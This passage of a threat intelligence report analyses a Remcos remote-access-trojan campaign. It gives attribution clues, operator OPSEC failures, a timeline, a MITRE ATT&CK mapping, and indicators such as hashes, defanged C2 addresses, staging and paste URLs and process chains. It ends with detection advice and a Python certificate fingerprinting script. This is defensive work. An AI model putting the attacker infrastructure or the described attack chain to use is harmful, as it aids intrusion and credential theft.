- The filename typo (ethebesttimeforeverythingtoleae.js) -- systematic letter-dropping in English words is a common error pattern for Portuguese speakers
None of these individually would be sufficient for attribution. Taken together, they paint a consistent picture.
OPSEC Failures
This operator makes mistakes that more disciplined threat actors would not:
- Open directory listing on /221/, exposing a parallel campaign's artifacts to anyone who browses the staging server
- Default XAMPP dashboard accessible at the staging server root, advertising the exact software stack
- Reused .NET loader across campaigns -- the same hash has been public since February 26, giving defenders two weeks of lead time
- All C2 servers in one /24 subnet -- a single abuse report to HostPapa could take down the entire operation
- Concurrent campaigns on the same staging server -- cross-campaign linkage is trivial
- Portuguese comment in production code -- a development artifact that narrows attribution
- Default Remcos TLS certificate on all 5 listeners on the primary C2 -- trivial fingerprinting
- Paste services for payload hosting -- auditable, reportable, and subject to takedown
The sophistication-to-OPSEC ratio is telling. The operator has technical skill: multi-stage delivery chains, process hollowing, reflective assembly loading, paste service failover, multiple C2 servers. But the operational discipline is absent. This profile is consistent with a mid-tier cybercriminal who purchased Remcos Pro and has enough development skill to build custom delivery chains but has not internalized the practices that would make them harder to track.
Actor Timeline
The timeline reveals an operator who has been active in this subnet since at least late 2025:
| Date | Event |
|---|---|
| 2025-11-11 | XWorm C2 active at 96.44.159.208:4242 (possibly same actor) |
| 2026-01-02 | Remcos C2 deployed at 96.44.159.154:1212 |
| 2026-02-26 | .NET process hollowing loader first submitted to MalwareBazaar |
| 2026-03-04 | Remcos C2 at 96.44.159.137:14645 reported by DonPasci |
| 2026-03-05 | Remcos C2s at .225:14645, .222:14645, .151:14645 reported |
| 2026-03-07 | Remcos C2 at .165:14645 reported |
| 2026-03-10 00:55 | Campaign 2 payloads uploaded to staging server (/221/) |
| 2026-03-10 ~10:00 | Campaign 1 HTA (goodwill.hta) distributed |
| 2026-03-10 10:06 | goodwill.hta submitted to MalwareBazaar by pr0xylife |
The XWorm C2 from November 2025 is an open question. Same subnet, same provider, same hosting profile -- but XWorm is a different malware family with different tooling. It could be the same actor running multiple RATs (common in the Brazilian cybercrime ecosystem), a shared hosting environment with co-tenants, or coincidence. We assess with LOW confidence that it is the same operator.
The March timeline shows rapid expansion: four new C2 IPs in three days (March 4-7), followed by campaign deployment on March 10. The operator is scaling up.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Implementation |
|---|---|---|---|
| Initial Access | Spearphishing Attachment | T1566.001 | HTA file delivery (goodwill.hta) |
| Execution | VBScript | T1059.005 | HTA VBScript execution in mshta.exe |
| Execution | PowerShell | T1059.001 | Multi-stage PowerShell loaders with -ec flag |
| Execution | JavaScript | T1059.007 | JScript Stage 2 via WScript.exe |
| Execution | Malicious File | T1204.002 | HTA requires user execution |
| Execution | Windows Management Instrumentation | T1047 | Win32_Process.Create() hidden window launch |
| Persistence | Registry Run Keys | T1547.001 | CurrentUser registry persistence |
| Defense Evasion | Obfuscated Files or Information | T1027 | Whitespace padding, random case, base64, delimiter-based concatenation |
| Defense Evasion | Process Hollowing | T1055.012 | Injection into Msbuild.exe (x86) |
| Defense Evasion | Deobfuscate/Decode Files | T1140 | Base64, UTF-16LE, delimiter stripping |
| Defense Evasion | Masquerading | T1036 | Abuse of Msbuild.exe as LOLBin host |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | 3-second sleep timer |
| Credential Access | Credentials from Password Stores | T1555 | Outlook credential theft via Nirsoft tools |
| Credential Access | Keylogging | T1056.001 | Continuous keylogging to logs.dat |
| Collection | Screen Capture | T1113 | Screenshots every 10 seconds |
| Collection | Audio Capture | T1123 | 5-second audio recording clips |
| Collection | Email Collection | T1114 | Outlook account access |
| Command and Control | Application Layer Protocol | T1071 | TLS-encrypted C2 on port 14646 |
| Command and Control | Dynamic Resolution | T1568 | DuckDNS (dynamic DNS) for C2 domain resolution |
| Command and Control | Ingress Tool Transfer | T1105 | Multi-stage payload download chain |
| Command and Control | Web Service | T1102 | Paste services (pastefy.app, pastes.io) for payload hosting |
Indicators of Compromise
File Indicators
# Stage 1: HTA Dropper (goodwill.hta)
SHA256: ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e
SHA1: 7c66dcd951d4795fc8aae773f55aec385cfd1c7e
MD5: faeeeb063ff4d8bbfff9a1fae1b71ca8
# Stage 2: JavaScript Loader
SHA256: 1b9791c5c75b7eb0c7510c42c6381f4fbfc40539c3afaab192d0ee65ab591d28
# Stage 4: .NET Process Hollowing Loader (myprogram.exe)
SHA256: bd6b60ce34d8fa3f2b9d032b49aac5b47f868b09ab24ccbd9c7168e5bfc8e963
MD5: 13743b70ab1afec1d36b6b3d929cd44c
# Encrypted Remcos Payload
SHA256: 86e8ea352b0b478268775c078313b244183cc7a81ecfc8112738966a6c202fba
MD5: 82327ad776a2738130b59fbd05dbae98
# Campaign 2 HTA (unreported -- discovered via open directory)
SHA256: 77981d8f5314d1cb495a69075849eefed611edd29029492217f52cd04e982262
# Campaign 2 JavaScript Loader
SHA256: be085e98c07119287362328aa5b9ffe3f1b2b3607edf353d3e81333aff186af1
Network Indicators
# C2 Domain (defanged)
goodpeopleswhitbrigheartwinthisindustryi[.]duckdns[.]org (port 14646)
# C2 IPs (defanged)
96[.]44[.]159[.]137 (primary C2 -- ports 14641, 14642, 14645, 14646, 14647)
96[.]44[.]159[.]225 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]222 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]151 (secondary C2 -- port 14645)
96[.]44[.]159[.]165 (secondary C2 -- port 14645-14646)
96[.]44[.]159[.]154 (older C2 -- port 1212)
# Staging Server (defanged)
96[.]44[.]159[.]218 (XAMPP payload delivery)
# Staging URLs (defanged)
hxxp://96[.]44[.]159[.]218/220/seethebesttimeforeverythingtolearn[.]js
hxxp://96[.]44[.]159[.]218/221/nicewalkingwithbestthings[.]js
hxxp://96[.]44[.]159[.]218/221/ss/stlegoodfornewhingsforme[.]hta
# Paste Service URLs (defanged)
hxxps://pastefy[.]app/sLC7Jpkp/raw
hxxps://yaso[.]su/raw/UpxC8OJX
hxxps://pastes[.]io/raw/lE4qJRgR
TLS Certificate Indicators
| Serial Number | Hosts |
|---|---|
| 620F885FCCD540A59B778B08716661D1 | 96.44.159.137 (ports 14641, 14642, 14645, 14646, 14647) |
| 4B615D8D3F62857406372B7BB0C96304 | 96.44.159.225, 96.44.159.151 |
| 4DCC27375E5A83560A4E18FBEBBE055C | 96.44.159.222 |
| 6024F0D0D15B0FBF41D66C1235FD9A29 | 96.44.159.165 |
All certificates: ECDSA P-256, validity 1970-01-01 to 2090-12-31, empty subject/issuer (Remcos default).
Behavioral Indicators
# Mutex
Rmc-E3G25N
# Registry access
HKCU\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
# File system artifacts
%APPDATA%\remcos\logs.dat (keylogger output)
%APPDATA%\Screenshots\ (screenshot captures)
%APPDATA%\MicRecords\ (audio recordings)
%APPDATA%\ethebesttimeforeverythingtoleae.js (Stage 2 drop -- note typo)
remcos.exe copied to Remcos\ (persistence copy)
# Process relationships (detection signatures)
mshta.exe --> cmd.exe --> powershell.exe --> WScript.exe
powershell.exe --> csc.exe --> cvtres.exe (runtime C# compilation)
Msbuild.exe --> userinit.exe (Nirsoft credential harvesting)
# Process hollowing target
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe (x86)
Detection Recommendations
Immediate (24-48 hours)
- Block all IOCs listed above at the network perimeter -- IPs, domains, and paste service URLs
- Hunt for the mutex `Rmc-E3G25N` across endpoint telemetry
- Search for the keylogger file `logs.dat` under `%APPDATA%\remcos\`
- Check proxy and DNS logs for connections to the 96.44.159.0/24 subnet
- Block DuckDNS resolution at the DNS resolver level if it is not required for business operations
- Report the live paste URLs to pastefy.app and pastes.io abuse teams
Short-term (1-2 weeks)
- Deploy YARA rules targeting the HTA obfuscation pattern (200+ character whitespace padding between VBScript tokens) and the .NET loader hash
- Monitor the 96.44.159.0/24 subnet for new C2 deployments -- this operator is actively expanding
- Hunt for `Msbuild.exe` spawning `userinit.exe` as a process hollowing indicator
- Alert on `csc.exe` spawned as a child of `powershell.exe` -- this indicates runtime .NET compilation, which is abnormal in most environments
- Check email gateways for HTA attachments, particularly those exceeding 40KB
Medium-term (1-3 months)
- Develop a Suricata rule for the Remcos default TLS fingerprint: ECDSA P-256 certificate with epoch-start validity (1970-01-01), far-future expiry (2090-12-31), and blank subject/issuer fields on high-numbered ports
- Monitor DuckDNS for new domains resolving to the 96.44.159.0/24 range
- Track the .NET loader hash (`bd6b60ce...`) across MalwareBazaar for campaign evolution -- this loader is being reused and is likely to appear in future campaigns
- Coordinate with HostPapa abuse (net-abuse-global@hostpapa.com) for infrastructure takedown -- all 8 IPs are with the same provider
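Added example serving both the TLS certificate clustering section and the Suricata recommendation above: a stdlib-only parser that pulls serial, issuer, subject, validity and key algorithm out of a DER certificate and tests them against the Remcos default profile the report describes. Because no real Remcos certificate is reproduced here, the script also carries a small DER builder that constructs a synthetic certificate with those fields; its key and signature bytes are filler, and it is not a real Remcos certificate.

```python
"""Fingerprint the Remcos default TLS certificate profile from raw DER.

Added example, not from the original report. Stdlib only: a minimal DER
walker for the X.509 fields the fingerprint needs, plus a small DER builder
used to construct a synthetic certificate carrying the profile the report
describes (ECDSA P-256, validity 1970-01-01 to 2090-12-31, empty subject and
issuer). The synthetic certificate is not a real Remcos certificate; its key
and signature bytes are filler and only the fingerprinted fields are faithful.
"""
import hashlib
from datetime import date

OID_EC_PUBLIC_KEY = "1.2.840.10045.2.1"
OID_P256 = "1.2.840.10045.3.1.7"
OID_ECDSA_SHA256 = "1.2.840.10045.4.3.2"
EPOCH_START, FAR_FUTURE = date(1970, 1, 1), date(2090, 12, 31)


def der_read(buf: bytes, pos: int = 0):
    """Return (tag, value, next_pos) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                      # long form: next n bytes hold the length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length


def der_children(value: bytes) -> list:
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = der_read(value, pos)
        out.append((tag, val))
    return out


def decode_oid(value: bytes) -> str:
    parts, acc = [str(value[0] // 40), str(value[0] % 40)], 0
    for b in value[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            parts.append(str(acc))
            acc = 0
    return ".".join(parts)


def decode_time(tag: int, value: bytes) -> date:
    s = value.decode("ascii")
    if tag == 0x17:                        # UTCTime YYMMDD...: RFC 5280 century rule
        yy = int(s[:2])
        return date(1900 + yy if yy >= 50 else 2000 + yy, int(s[2:4]), int(s[4:6]))
    return date(int(s[:4]), int(s[4:6]), int(s[6:8]))   # GeneralizedTime YYYYMMDD...


def parse_cert(der_bytes: bytes) -> dict:
    """Extract the fields the fingerprint needs from a DER X.509 certificate."""
    _, cert, _ = der_read(der_bytes)
    fields = der_children(der_children(cert)[0][1])      # TBSCertificate
    i = 1 if fields[0][0] == 0xA0 else 0                 # skip explicit [0] version
    validity = der_children(fields[i + 3][1])
    key_alg = der_children(der_children(fields[i + 5][1])[0][1])
    return {
        "serial": f"{int.from_bytes(fields[i][1], 'big'):X}",
        "issuer_empty": len(fields[i + 2][1]) == 0,
        "subject_empty": len(fields[i + 4][1]) == 0,
        "not_before": decode_time(*validity[0]),
        "not_after": decode_time(*validity[1]),
        "key_oids": [decode_oid(v) for t, v in key_alg if t == 0x06],
        "sha256": hashlib.sha256(der_bytes).hexdigest(),
    }


def looks_like_remcos_default(info: dict) -> bool:
    return (info["issuer_empty"] and info["subject_empty"]
            and info["not_before"] == EPOCH_START and info["not_after"] == FAR_FUTURE
            and info["key_oids"] == [OID_EC_PUBLIC_KEY, OID_P256])


# DER building, used only to construct the synthetic sample below.
def der(tag: int, payload: bytes) -> bytes:
    n = len(payload)
    if n < 0x80:
        return bytes([tag, n]) + payload
    lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(lb)]) + lb + payload


def encode_oid(s: str) -> bytes:
    parts = [int(p) for p in s.split(".")]
    body = bytearray([parts[0] * 40 + parts[1]])
    for p in parts[2:]:
        chunk = [p & 0x7F]
        p >>= 7
        while p:
            chunk.append(0x80 | (p & 0x7F))
            p >>= 7
        body += bytes(reversed(chunk))
    return der(0x06, bytes(body))


def der_time(s: str) -> bytes:
    return der(0x17 if len(s) == 13 else 0x18, s.encode("ascii"))   # UTCTime vs GeneralizedTime


def synthetic_cert(serial_hex: str, not_before: str = "700101000000Z",
                   not_after: str = "20901231235959Z") -> bytes:
    serial = int(serial_hex, 16)
    sig_alg = der(0x30, encode_oid(OID_ECDSA_SHA256))
    spki = der(0x30, der(0x30, encode_oid(OID_EC_PUBLIC_KEY) + encode_oid(OID_P256))
               + der(0x03, b"\x00\x04" + b"\x11" * 64))      # filler point, not a real key
    tbs = der(0x30, der(0xA0, der(0x02, b"\x02"))              # version v3
              + der(0x02, serial.to_bytes((serial.bit_length() + 8) // 8, "big"))
              + sig_alg + der(0x30, b"")                       # empty issuer Name
              + der(0x30, der_time(not_before) + der_time(not_after))
              + der(0x30, b"") + spki)                         # empty subject Name
    return der(0x30, tbs + sig_alg + der(0x03, b"\x00" + b"\x22" * 70))   # filler signature


if __name__ == "__main__":
    for serial in ("620F885FCCD540A59B778B08716661D1", "4B615D8D3F62857406372B7BB0C96304"):
        info = parse_cert(synthetic_cert(serial))
        print(info["serial"], "remcos-default" if looks_like_remcos_default(info) else "other")
```

Point `parse_cert` at the DER bytes of a certificate taken from a TLS probe of a suspect host and the profile check becomes the pre-filter for the Suricata rule; the serials it reports are the values to cluster on, and the SHA-256 it computes is a convenient pivot key when sharing the indicator.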
References
- MalwareBazaar: https://bazaar.abuse.ch/sample/ed925501e749cdc073143ed948ec8a93c6b6a4b76304d9c6a76c6faabc8d048e/
- Triage Sandbox: https://tria.ge/reports/260310-l5rnlafx8x/
- CAPE Sandbox (.NET loader): https://www.capesandbox.com/analysis/54704/
- ThreatFox IOC: https://threatfox.abuse.ch/ioc/1762760/
- ThreatFox IOC (prior): https://threatfox.abuse.ch/ioc/1758481/
- Malpedia Remcos: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Published by Breakglass Intelligence. Investigation conducted 2026-03-10. 1 HTA file. 5 attack stages. 7 C2 servers. 2 campaigns. 8 OPSEC failures. 1 Portuguese comment that gave you away. Classification: TLP:CLEAR